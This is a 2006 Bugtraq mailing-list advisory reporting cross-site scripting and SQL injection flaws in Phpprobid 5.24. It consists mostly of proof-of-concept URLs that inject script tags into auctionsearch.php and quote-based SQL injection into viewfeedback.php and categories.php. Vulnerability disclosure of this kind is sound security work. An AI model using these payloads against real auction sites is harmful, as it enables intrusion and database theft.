Bugtraq mailing list archives
Phpprobid <= 5.24 XSS SQL injection Vulnerability
From: securityconnection () gmail com
Date: 25 Jul 2006 17:15:14 -0000
Phpprobid 5.24 http://www.phpprobid.com -------------------------- Cross Site Scripting (XSS) -------------------------- http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script> http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script> ------------- SQL injection ------------- http://target.xx/viewfeedback.php?view=1'[SQL] http://target.xx/viewfeedback.php?view=all&start=1'[SQL] http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL] ----------------- Ellipsis Security http://www.ellsec.org
Current thread:
- Phpprobid <= 5.24 XSS SQL injection Vulnerability securityconnection (Jul 26)